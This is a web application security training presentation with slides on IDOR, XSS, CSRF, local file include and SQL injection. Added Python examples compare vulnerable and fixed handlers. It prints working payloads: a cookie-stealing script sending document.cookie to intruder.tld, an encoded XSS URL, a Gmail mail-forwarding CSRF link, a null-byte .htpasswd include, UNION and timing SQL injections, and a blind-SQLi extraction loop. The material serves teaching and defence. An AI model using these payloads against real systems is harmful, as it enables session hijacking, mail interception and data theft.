11.
Web vulnerabilities make up nearly half of all vulnerabilities discovered in 2007
(SANS)
12.
Why?
A really popular medium ($)
Immature technology
Logical errors
Home-made solutions
13.
Phishing victims in the US
3.6 million people lost $3.2 billion in total
(Gartner, http://www.heise-online.pl/news/item/2356/)
14.
Standard Web application architecture
Internet
-> WWW layer (I/O filters)
-> Application layer (business logic)
-> Database server
15.
Wrong!
Internet
-> WWW layer (I/O filters)
   New functionality added outside the existing layers, so it is not covered by the I/O filters
-> Application layer (business logic)
-> Database server
16.
Application Firewall vs. proper architecture, coding and SDLC
Internet
-> Web Application Firewall
-> WWW layer (I/O filters)
   New functionality still outside the existing layers; the WAF only sits in front of it
-> Application layer (business logic)
-> Database server
17.
The right approach
Internet
-> Web Application Firewall
-> WWW layer (I/O filters)
-> Application layer, new functionality included (business logic)
-> Database server
18.
Most popular attacks
PHP Remote File Include
SQL Injection
Cross-Site Scripting
Cross-site Request Forgery
(SANS Top-20 2007 Security Risks, 2007 Annual Update)
27.
Conclusion?
Staying secure requires a specific mindset
(Paranoia? ;-)
28.
Client-side access control
The interface can be bypassed
(unlike an ATM's)
Does not work!
29.
Client-side access control
RSS feed name based on the user ID:
server.tld/rss/100_rss.xml
server.tld/rss/101_rss.xml
server.tld/rss/102_rss.xml
Reading other users' messages by changing the ID:
server.tld/index.php?p=ok&action=msgs2&msgs_id=80
server.tld/index.php?p=ok&action=msgs2&msgs_id=81
server.tld/index.php?p=ok&action=msgs2&msgs_id=82
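The fix for the enumeration above is to decide access on the server, from the authenticated session, rather than trusting that the user only follows the links the interface shows. The following Python is an added example, not code from the presentation: the message store, the user ids 100-102 and the handler names are constructed to mirror the URLs on the slide.

```python
"""Added example: enforcing access control on the server instead of the client."""

# Constructed sample store: message id -> (owner's user id, body)
MESSAGES = {
    80: (100, "message belonging to user 100"),
    81: (101, "message belonging to user 101"),
    82: (102, "message belonging to user 102"),
}


class Forbidden(Exception):
    """Raised when the session's user may not read the requested object."""


def get_message_vulnerable(session_user_id, msgs_id):
    """Models index.php?p=ok&action=msgs2&msgs_id=N as the slide describes it:
    the only 'access control' is that the UI shows you your own ids, so
    changing 80 to 81 in the URL reads another user's message."""
    owner_id, body = MESSAGES[msgs_id]
    return body


def get_message_checked(session_user_id, msgs_id):
    """Same lookup, but ownership is verified against the server-side session.
    A missing id and a foreign id get the same answer, so ids cannot be probed."""
    record = MESSAGES.get(msgs_id)
    if record is None or record[0] != session_user_id:
        raise Forbidden(f"user {session_user_id} may not read message {msgs_id}")
    return record[1]


def rss_path_for(session_user_id):
    """The feed name is derived from the authenticated session, never from a
    user-supplied id, so user 100 cannot ask for /rss/101_rss.xml."""
    return f"/rss/{session_user_id}_rss.xml"


def readable_messages(session_user_id, handler):
    """Enumerate ids the way an intruder would (80, 81, 82, ...) and report
    which ones the given handler lets this user read."""
    readable = []
    for msgs_id in sorted(MESSAGES):
        try:
            handler(session_user_id, msgs_id)
        except (Forbidden, KeyError):
            continue
        readable.append(msgs_id)
    return readable


if __name__ == "__main__":
    print("vulnerable handler:", readable_messages(100, get_message_vulnerable))
    print("checked handler:   ", readable_messages(100, get_message_checked))
```

For static files such as the RSS feeds the same rule applies: serve them through an authenticated handler that derives the file name from the session, not from a path the client can edit.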
32.
Reflective XSS
Intruder -> User: a link to http://server/index.php?id=<script>…</script>
User -> Web Application (Server):
GET /index.php?id=<script>…</script> HTTP/1.1
Web Application -> User:
…<script>…</script>…
User's browser: exec(…)
Data available in the context of the User
33.
Example XSS code
document.write('<img src="http://intruder.tld/cookiemonster.gif?' + escape(document.cookie) + '">');
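The payload above works because the server puts the attacker's text into an HTML context unchanged. The Python below is an added example (not the presentation's code) that renders the "Results for:" fragment from the later slide two ways: once behind the kind of black-list that strips a literal <script>, once with output encoding for the HTML-text context. The three payloads are constructed for the demo and the rendered HTML is never sent anywhere.

```python
"""Added example: black-list filtering versus contextual output encoding."""
import html

# Constructed attacker inputs, in the spirit of the cookiemonster.gif payload
SAMPLE_PAYLOADS = [
    "<script>document.write('<img src=\"http://intruder.tld/cookiemonster.gif?'"
    "+escape(document.cookie)+'\">')</script>",
    "<ScRipT>alert(1)</ScRipT>",          # case variant defeats a literal match
    "<img src=x onerror=alert(1)>",       # no <script> tag at all
]

# The fragment from the 'Results for:' page, untrusted part in the braces
TEMPLATE = '<h2>Results for: <span style="color: #f00;">{}</span></h2>'


def blacklist_filter(value):
    """A black-list of the kind the slides warn about: it strips exactly the
    lower-case tag and nothing else."""
    return value.replace("<script>", "").replace("</script>", "")


def render_results_blacklist(query):
    return TEMPLATE.format(blacklist_filter(query))


def render_results_escaped(query):
    """Encode for the HTML-text context: < > & " ' become entities, so the
    browser displays the attacker's text instead of parsing it as markup."""
    return TEMPLATE.format(html.escape(query, quote=True))


def untrusted_part(rendered):
    """Slice out what the user controlled, between the <span ...> and </span>."""
    start = rendered.index(';">') + len(';">')
    end = rendered.rindex("</span>")
    return rendered[start:end]


def fragment_is_inert(rendered):
    """In HTML-text context a '<' is the only way to open a tag; if none
    survived in the untrusted part, no markup was injected."""
    return "<" not in untrusted_part(rendered)


def survey(renderer):
    """Return how many of the sample payloads still inject markup."""
    return sum(not fragment_is_inert(renderer(payload)) for payload in SAMPLE_PAYLOADS)


if __name__ == "__main__":
    print("payloads surviving the black-list:", survey(render_results_blacklist))
    print("payloads surviving output encoding:", survey(render_results_escaped))
```

The encoding is context-specific: html.escape is right for text between tags and for double-quoted attribute values, but a value placed inside a <script> block or a URL needs a different encoder.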
35.
Rebranding through XSS
http://server.tld/topics/%3Cscript%3Eeval(String.fromCharCode(100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,34,108,111,103,111,34,41,46,105,110,110,101,114,72,84,77,76,61,34,60,105,109,103,32,115,114,99,61,39,104,116,116,112,58,47,47,119,119,119,46,101,122,111,116,101,114,105,107,97,46,112,108,47,105,109,97,103,101,115,47,115,109,105,108,101,121,46,103,105,102,39,62,34));%3C%252fscript%3E
Decoded, the payload is:
document.getElementById("logo").innerHTML="<img src='http://www.srv.tld/images/smiley.gif'>"
36.
This is how it looks in the webpage code
...
<div id="maincontent">
<h2>Results for: <span style="color: #f00;"><script>eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,34,108,111,103,111,34,41,46,105,110,110,101,114,72,84,77,76,61,34,60,105,109,103,32,115,114,99,61,39,104,116,116,112,58,47,47,119,119,119,46,101,122,111,116,101,114,105,107,97,46,112,108,47,105,109,97,103,101,115,47,115,109,105,108,101,121,46,103,105,102,39,62,34));</script></span></h2>
</div>
...
37.
The code that is to be changed
<div id="logo">
<div class="logolink">
<a href="http://server.tld/">server.tld</a>
</div>
...
</div>
41.
Content change using XSS
Is not permanent
Better code is easier (sic!)
An idea: a form that looks just like a legitimate one, but sends the input data elsewhere: phishing
42.
Authentication using cookies
User -> Server:
POST /login.php HTTP/1.1
login=user&password=asd12ed]r3
Server -> User:
HTTP/1.1 200 OK
Set-Cookie: user_id=734223s8uod42
Welcome user
User -> Server:
GET /index.php HTTP/1.1
Cookie: user_id=734223s8uod42
Server -> User:
Welcome user
43.
Impersonating a legitimate user
User -> Server:
POST /login.php HTTP/1.1
login=user&password=asd12ed]r3
Server -> User:
HTTP/1.1 200 OK
Set-Cookie: user_id=734223s8uod42
Welcome user
User -> Server:
GET /index.php HTTP/1.1
Cookie: user_id=734223s8uod42
Server -> User:
Welcome user
Intruder (with the stolen cookie) -> Server:
GET /index.php HTTP/1.1
Cookie: user_id=734223s8uod42
Server -> Intruder:
Welcome user
48.
How to send yourself a cookie?
XMLHttpRequest
- troublesome across domains
Link
- img, iframe, location.href, etc.
Example:
<img src="http://server.tld/cookiemonster.gif?PHPSESSID%3Dgji9h519llgbgbnaqg7si0q1l0%3B%20__utma%3D258102041.949163972.1198624259.1198624259.1198624259.1%3B%20__utmb%3D258102041%3B%20__utmc%3D258102041%3B%20__utmz%3D258102041.1198624259.1.1.utmccn%3D%28direct%29%7Cutmcsr%3D%28direct%29%7Cutmcmd%3D%28none%29">
49.
What can we do?
Tie the session ID to an IP address
Require re-authentication
Filter or sanitise input data !!!
- White-listing (black-lists miss variants such as ScRipT)
- Consistency (IDS, firewall and application must decode input the same way)
- In depth (nested encodings: ....// ../, UTF-7)
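The first two countermeasures on this slide, plus the cookie flags that keep document.cookie from handing the session to cookiemonster.gif, are shown in the Python below. It is an added example, not the presentation's code: the in-memory dict stands in for a server-side session store, the 15-minute re-authentication window is a constructed policy, and SameSite is a browser feature that did not exist in 2007.

```python
"""Added example: a session cookie issued and checked the way slide 49 recommends."""
import secrets
import time

SESSIONS = {}  # sid -> {"user", "ip", "issued"}; this never leaves the server
REAUTH_AFTER_SECONDS = 15 * 60  # constructed policy for sensitive operations


def create_session(user, client_ip, now=None):
    """Issue a fresh, unguessable id at login. 32 random bytes from the OS
    CSPRNG: unlike user_id=734223s8uod42 it encodes nothing about the user
    and cannot be enumerated or predicted."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user, "ip": client_ip,
                     "issued": now if now is not None else time.time()}
    return sid


def set_cookie_header(sid):
    """HttpOnly keeps document.cookie (and so an injected script) from reading
    the value; Secure keeps it off plaintext HTTP; SameSite=Strict stops the
    browser attaching it to cross-site requests (a later addition, not 2007)."""
    return f"Set-Cookie: sid={sid}; Path=/; HttpOnly; Secure; SameSite=Strict"


def parse_cookie_header(header):
    """'Cookie: a=1; b=2' -> {'a': '1', 'b': '2'}"""
    _, _, value = header.partition(":")
    pairs = (part.strip().partition("=") for part in value.split(";") if "=" in part)
    return {key: val for key, _, val in pairs}


def resolve_session(cookie_header, client_ip):
    """Return the user for a request, or None. The session is bound to the IP
    it was issued for, so a cookie replayed from the intruder's address fails.
    Caveat: this also logs out users whose address changes (mobile, proxies)."""
    sid = parse_cookie_header(cookie_header).get("sid")
    session = SESSIONS.get(sid)
    if session is None or session["ip"] != client_ip:
        return None
    return session["user"]


def needs_reauthentication(cookie_header, now=None):
    """Sensitive operations (password change, deletion) require a recent
    login regardless of whether the cookie is otherwise valid."""
    sid = parse_cookie_header(cookie_header).get("sid")
    session = SESSIONS.get(sid)
    if session is None:
        return True
    current = now if now is not None else time.time()
    return current - session["issued"] > REAUTH_AFTER_SECONDS


if __name__ == "__main__":
    sid = create_session("user", "10.0.0.5")
    print(set_cookie_header(sid))
    print("same IP:", resolve_session(f"Cookie: sid={sid}", "10.0.0.5"))
    print("intruder IP:", resolve_session(f"Cookie: sid={sid}", "203.0.113.9"))
```

The IP binding is the slide's suggestion and is shown as written; in practice most sites rely on HttpOnly, short lifetimes and re-authentication instead, because the binding breaks for legitimate users behind changing addresses.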
50.
http://server.tld/topics/<img src=http://www.serv.tld/images/smiley.gif>
/
54.
Stored XSS
Intruder -> Web Application (Server):
POST /register.php HTTP/1.1
login=<script>…</script>&password=asd
The payload is stored in the Database.
User -> Web Application:
GET /index.php HTTP/1.1
Web Application -> User:
…<script>…</script>…
User's browser: exec(…)
Data available in the context of the User
55.
Stored XSS exploitation?
Permanent content alteration
Easy session ID hijack
CSRF
XSS Proxy
Automated worms
- mySpace, Orkut, Nduja, Borys
Easy ;] in web portals that allow users to publish their own content:
- bidding portals, blogs, web fora, etc.
57.
XSS Worm
Web Server, Intruder, User_1, User_2
Step 1: the Intruder stores the XSS-worm code in their profile on the Web Server.
…
58.
XSS Worm
Step 2: User_1 views the Intruder's profile: GET /intruder/ HTTP/1.1
The Web Server returns …<script>…</script>…, User_1's browser exec(…)s the worm,
and the worm stores the XSS-worm code in User_1's profile.
…
59.
XSS Worm
Step 3: User_2 views User_1's profile: GET /user1/ HTTP/1.1
The Web Server returns …<script>…</script>…, User_2's browser exec(…)s the worm,
and the worm stores the XSS-worm code in User_2's profile, and so on
…
60.
Nduja – A Cross Domain/Webmail XSS Worm
Intruder -> E-mail -> infected WebMail account -> E-mail -> next WebMail account -> …
Web Servers / WebMail: Libero.it, Tiscali.it, Lycos.it, Excite.com
61.
What can we do?
Tie the session ID to an IP address
Require re-authentication
Filter or sanitise input data !!!
- White-listing (black-lists miss variants such as ScRipT)
- Consistency (IDS, firewall and application must decode input the same way)
- In depth (nested encodings: .. ..// ../, UTF-7)
Filter or sanitise data stored in and read from the database
63.
CSRF
Intruder -> User: a link to http://server.tld/delete.php?id=34
User -> Web Application (Server):
GET /delete.php?id=34 HTTP/1.1
Cookie: user_id=734223s8uod42
Web Application:
…
id = 34;
delete(id);
…
Web Application -> User:
Item deleted!
64.
Useful in getting to know your users a wee bit better…
<img src="http://nasza-klasa.pl/invite/1?i=1">
(/var/log/apache/fbi_cia_what-not_access.log)
65.
Gmail message interception (CSRF)
http://www.gnucitizen.org/util/csrf?_method=POST&_enctype=multipart/form-data&_action=https%3A//mail.google.com/mail/h/wt1jmuj4ddv/%3Fv%3Dprf&cf2_emc=true&cf2_email=evilinbox@mailinator.com&cf1_from&cf1_to&cf1_subj&cf1_has&cf1_hasnot&cf1_attach=true&tfi&s=z&irf=on&nvp_bu_cftb=Create%20Filter
Everyone (well, almost) has a Gmail account!
(Domain hijack: www.davidairey.co.uk)
66.
What can we do?
POST instead of GET
- not very bullet-proof: iframe, JavaScript
Referer header
- not very bullet-proof either: proxies, browsers, header alteration
Additional temporary ID
- user ID tied to a long unpredictable key
- the ID-key association held on the server side
Re-authentication before sensitive operations
Vulnerability-free code!!!
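The "additional temporary ID" on this slide is what is now called a CSRF token. The Python below is an added example, not the presentation's code, of a delete.php-style handler that combines the slide's measures: POST only, an unpredictable per-session token whose association with the user lives on the server, and an ownership check. The session and item tables are constructed; the cookie value is the slide's own.

```python
"""Added example: delete.php protected with POST-only plus a server-side CSRF token."""
import hmac
import secrets

# Constructed server-side state. The cookie value is the slides' own example.
SESSIONS = {"734223s8uod42": {"user": "user", "csrf": None}}
ITEMS = {34: "user", 35: "user", 36: "someone_else"}  # item id -> owner


def issue_csrf_token(sid):
    """Called when rendering the form: the token goes into a hidden field and
    is remembered server-side. It is not in the cookie, so a cross-site
    request (which the browser sends with cookies only) cannot know it."""
    token = secrets.token_hex(16)
    SESSIONS[sid]["csrf"] = token
    return token


def handle_delete(method, cookie_header, form):
    """Returns (status, body). `form` is the parsed request body."""
    sid = cookie_header.partition("user_id=")[2].split(";")[0]
    session = SESSIONS.get(sid)
    if session is None:
        return 401, "Login required"
    # 1. POST only: an <img src="...delete.php?id=34"> is a GET and dies here.
    #    The slide is right that this alone is weak: a hidden <form> can POST.
    if method != "POST":
        return 405, "POST required"
    # 2. Token check in constant time. Missing or stale token -> refuse.
    expected = session["csrf"]
    supplied = form.get("csrf", "")
    if not expected or not hmac.compare_digest(supplied.encode(), expected.encode()):
        return 403, "Invalid request token"
    # 3. Tokens are single-use, so a captured form cannot be replayed.
    session["csrf"] = None
    # 4. Still check ownership: CSRF protection is not authorization.
    item_id = int(form.get("id", -1))
    if ITEMS.get(item_id) != session["user"]:
        return 403, "Not your item"
    del ITEMS[item_id]
    return 200, "Item deleted!"


if __name__ == "__main__":
    cookie = "Cookie: user_id=734223s8uod42"
    print("forged GET:", handle_delete("GET", cookie, {"id": "34"}))
    print("forged POST:", handle_delete("POST", cookie, {"id": "34"}))
    token = issue_csrf_token("734223s8uod42")
    print("real form:", handle_delete("POST", cookie, {"id": "34", "csrf": token}))
```

The Referer check the slide calls unreliable is left out on purpose; re-authentication before the most sensitive operations, also listed on the slide, would sit in front of step 4.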
68.
Local file include
Local file snooping (configs)
Arbitrary code execution (if file upload to the server is permitted)
Access to source code
<?php
if (file_exists("includes/$page.inc")) {
    include "includes/$page.inc";
} else {
    echo "In construction!<BR>";
}
http://XXXXX.art.pl/p.php?page=../../../../../../../../../home/user1/public_html/.htpasswd%00
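Two things make the request above work: the directory traversal, and the %00 at the end, which the web server decodes into a NUL byte so that the C-level file functions behind PHP's include stop reading the path before the ".inc" suffix. The Python below is an added example, not the presentation's code: it models the path resolution only (nothing is read from disk), and INCLUDE_DIR and the allow-list of page names are constructed. PHP itself has rejected paths containing NUL bytes since 5.3.4, but the traversal half of the attack is unaffected by that.

```python
"""Added example: the %00 local-file-include trick and a safe include resolver."""
import os
import re
import urllib.parse

INCLUDE_DIR = os.path.realpath("includes")
ALLOWED_PAGES = {"home", "about", "contact"}  # constructed allow-list


def c_string(s):
    """What a NUL-terminated C API (the fopen() behind old PHP's include)
    sees: everything from the first \\0 byte onward is gone, '.inc' included."""
    return s.split("\x00", 1)[0]


def resolve_include_vulnerable(page_param):
    """include "includes/$page.inc" as on the slide: the parameter is
    URL-decoded (so %00 becomes a NUL byte) and concatenated unchecked."""
    page = urllib.parse.unquote(page_param)
    return c_string(f"includes/{page}.inc")


def resolve_include_safe(page_param):
    """Three independent checks; any one failing returns None:
    1. reject NUL bytes and anything but a short [a-z0-9_] name,
    2. the name must be on the allow-list of known pages,
    3. the resolved real path must still lie inside INCLUDE_DIR
       (defence in depth in case 1 or 2 is loosened later)."""
    page = urllib.parse.unquote(page_param)
    if "\x00" in page or not re.fullmatch(r"[a-z0-9_]{1,32}", page):
        return None
    if page not in ALLOWED_PAGES:
        return None
    path = os.path.realpath(os.path.join(INCLUDE_DIR, page + ".inc"))
    if os.path.commonpath([path, INCLUDE_DIR]) != INCLUDE_DIR:
        return None
    return path


if __name__ == "__main__":
    attack = "../../../../../../../../../home/user1/public_html/.htpasswd%00"
    print("vulnerable opens:", resolve_include_vulnerable(attack))
    print("safe resolver:   ", resolve_include_safe(attack))
    print("safe resolver:   ", resolve_include_safe("home"))
```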
70.
What can we do?
Harden the application server (e.g. in php.ini):
allow_url_fopen = Off
allow_url_include = Off
register_globals = Off
safe_mode = On
safe_mode_gid = Off
display_errors = Off
log_errors = On
error_log = /var/log/httpd/php_error.log
disable_functions = system, shell_exec, exec, passthru
(safe_mode and register_globals were removed in PHP 5.4; the remaining directives still apply)
Watch out for special characters (null byte, etc.)
Filter and sanitise (../, UTF, etc.)
mod_security (WAF), Suhosin (PHP hardening)
72.
SQL Injection
Intruder -> Web Application (Server):
GET /login.php HTTP/1.1
login=admin&password=1' or 1='1
Web Application -> Database:
select * from users where login='admin' and pass='1' or 1='1'
Web Application -> Intruder:
Welcome admin!
The vulnerable code:
$dane = db_exec("select * from users where login='$login' and pass='$pass'");
if (count($dane)) {
    print("Welcome $login");
    …
} else {
    print("Bye");
    exit(0);
}
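The login above, rebuilt in Python on an in-memory SQLite database, as an added example that is not the presentation's code: once with the string concatenation the slide shows, once with a parameterised query. The user rows are constructed (the admin password is the slide's own). One dialect caveat: MySQL coerces 1='1' to true, SQLite compares the integer and the string strictly and gets false, so the demo uses the equivalent payload x' or '1'='1, which works on both.

```python
"""Added example: slide 72's login with concatenated SQL versus a parameterised query."""
import sqlite3


def make_users_db():
    con = sqlite3.connect(":memory:")
    con.execute("create table users(login text, pass text)")
    # Plaintext passwords mirror the slide's query; a real system stores hashes.
    con.executemany("insert into users values (?, ?)",
                    [("admin", "asd12ed]r3"), ("user", "letmein")])
    return con


def vulnerable_sql(login, password):
    """The query string the slide's db_exec() receives."""
    return f"select * from users where login='{login}' and pass='{password}'"


def login_vulnerable(con, login, password):
    """$dane = db_exec("... login='$login' and pass='$pass'"); if (count($dane)) ...
    With password "x' or '1'='1" the WHERE clause becomes
    login='admin' and pass='x' or '1'='1', which is true for every row."""
    rows = con.execute(vulnerable_sql(login, password)).fetchall()
    return len(rows) > 0


def login_safe(con, login, password):
    """Placeholders hand the values to the driver separately from the SQL
    text, so user input is never parsed as SQL; the quotes are just data."""
    rows = con.execute("select * from users where login=? and pass=?",
                       (login, password)).fetchall()
    return len(rows) > 0


if __name__ == "__main__":
    con = make_users_db()
    payload = "x' or '1'='1"
    print(vulnerable_sql("admin", payload))
    print("vulnerable login:", login_vulnerable(con, "admin", payload))
    print("parameterised login:", login_safe(con, "admin", payload))
```

Filtering the quote character is not a substitute for parameterisation: numeric parameters need no quote at all, and as the next slides show, a single stray quote is enough to start a UNION.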
75.
priv_search=&cat=1&w_city=Ca%B3a+Polska' and 1=0#&submit=Szukaj
76.
priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select @@version#&submit=Szukaj
Error: "The used SELECT statements have a different number of columns"
77.
priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,@@version#&submit=Szukaj
(18 columns: the error is gone)
78.
priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select 1,2,3,4,5,6,7,8,9,10,@@version,12,13,14,15,16,17,18#&submit=Szukaj
(@@version moved to a column the page actually displays)
79.
priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select 1,2,3,TABLE_SCHEMA,5,6,7,8,9,10,TABLE_NAME,12,COLUMN_NAME,14,15,16,17,18 from information_schema.columns where TABLE_SCHEMA != 'mysql' and TABLE_SCHEMA != 'information_schema'#&submit=Szukaj
(lists every schema, table and column except MySQL's own)
84.
Blind SQL Injection (experimenting)
1' and 1='0
-> OK
1' or 1='1
-> "This email is already registered. You need to pick another one"
1' union all SELECT IF(user() like '%sig%', BENCHMARK(3000000,MD5('x')), NULL)#
-> delay: user() matches sig@…
1' union all SELECT IF(user() like '%asd%', BENCHMARK(3000000,MD5('x')), NULL)#
-> no delay
86.
Product database for selected category is empty
87.
Blind SQL Injection
/zgoda.php?id=155765%20AND%20(select%20ascii(substring((select%20login%20from%20admini%20limit%201,1),1,1)))%3D97
Decoded, with placeholders:
id=155765 AND (select ascii(substring((select login from admini limit ROW,1), POSITION, 1))) = ASCII_CODE
88.
Results of a successful blind
SQL Injection attack
Delay
Different content
Error message
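The zgoda.php request on the earlier slide is one probe of a loop: for each position, ask whether the character's code equals (or, faster, exceeds) a guess and read the answer off whether the normal page or the "Product database for selected category is empty" page comes back. The Python below is an added example, not the presentation's code, running that loop against a constructed SQLite target: SQLite's unicode() and substr() stand in for MySQL's ascii() and substring(), the admini row is invented, and a binary search over printable ASCII replaces the slide's =97 equality test so each character costs about 7 requests instead of up to 95.

```python
"""Added example: boolean-based blind SQL injection, character by character."""
import sqlite3


class Target:
    """Simulates zgoda.php: the id parameter is concatenated into SQL (the
    bug), and the only feedback is which of two pages comes back."""

    def __init__(self):
        self.con = sqlite3.connect(":memory:")
        self.con.execute("create table admini(login text, pass text)")
        self.con.execute("insert into admini values ('sigma', 'hunter2')")  # constructed
        self.con.execute("create table zgoda(id integer, body text)")
        self.con.execute("insert into zgoda values (155765, 'some content')")
        self.requests = 0

    def zgoda(self, id_param):
        self.requests += 1
        rows = self.con.execute(f"select body from zgoda where id={id_param}").fetchall()
        return "OK" if rows else "Product database for selected category is empty"


def oracle(target, condition):
    """True when the page renders normally, i.e. the injected condition held."""
    return target.zgoda(f"155765 AND ({condition})") == "OK"


def extract_login(target, row=0, max_len=32):
    """Recover admini.login for the given row one character at a time.
    ROW, POSITION and ASCII_CODE from the slide are the loop variables here."""
    subselect = f"(select login from admini limit {row},1)"
    result = ""
    for position in range(1, max_len + 1):
        if not oracle(target, f"length({subselect}) >= {position}"):
            break  # no more characters
        lo, hi = 32, 126  # printable ASCII; narrow the range with each answer
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(target, f"unicode(substr({subselect}, {position}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


if __name__ == "__main__":
    target = Target()
    print("extracted:", extract_login(target), "in", target.requests, "requests")
```

The same loop drives the timing variant from the BENCHMARK() slide: replace the two-page oracle with "did the response take noticeably longer", and the error-message variant with "did the page break".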
89.
What can we do?
Filter and sanitise input data
- Characters white-listing
- Consistency (IDS, Firewall,
Application, Database)
Do not trust user-side filters
(selection lists, JavaScript, etc)
91.
Web application security is bad
Vulnerability-causing mistakes are
everywhere*
*well, almost everywhere ;-)
92.
What to do?
Be sure to properly sanitise data
coming from and being sent to the
user
Web Application Firewall (WAF)
IDS
White-listing!
93.
Be aware of potential threats
Listen and ask
Use professional assistance
Perform a cost-benefit analysis
Every piece of feedback is worth listening to
94.
Use proven solutions
• Traditional coding errors got answered by
managed code, automatic typing, GC, etc.
• Web frameworks help maintain code quality
in Web Applications
– Assure code quality to some degree
– We are not 100% safe
» Frameworks are not mature enough
» Not everyone knows how to use them properly
» Sometimes expanded in a dumb way
» Wide exploitation due to mass usage
95.
Hardening
Proper configuration is key!
One application server configuration directive may prevent a vulnerability from being exploited
PHP:
http://www.sans.org/top20/#s1
96.
Think!
No technical control will
protect you from logical
errors